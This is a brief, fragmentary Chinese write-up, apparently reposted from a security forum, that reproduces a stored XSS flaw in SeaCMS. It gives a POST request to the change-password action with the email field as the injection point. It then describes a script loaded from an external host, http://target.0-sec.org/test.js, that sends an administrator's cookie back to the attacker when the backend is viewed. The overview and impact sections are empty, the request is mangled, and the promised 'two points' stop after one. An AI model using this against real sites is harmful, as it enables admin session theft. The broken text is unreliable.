# Seacms储存型xss
> 原文:[https://www.zhihuifly.com/t/topic/3111](https://www.zhihuifly.com/t/topic/3111)
# Seacms 储存型xss
## 一、漏洞简介
## 二、漏洞影响
## 三、复现过程
“`
POST /member.php?action=chgpwdsubmit `oldpwd=test&newpwd=test&newpwd2=test&email=test%[40test.com](http://40test.com)
“`
> src的值为`http://target.0-sec.org/test.js`的短链接
当后台浏览到后台界面时,会触发漏洞,反弹回来Cookie,但需要注意两点,第一,只有系统管理员才能看到用户界面,普通管理员是没有这个权限的。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容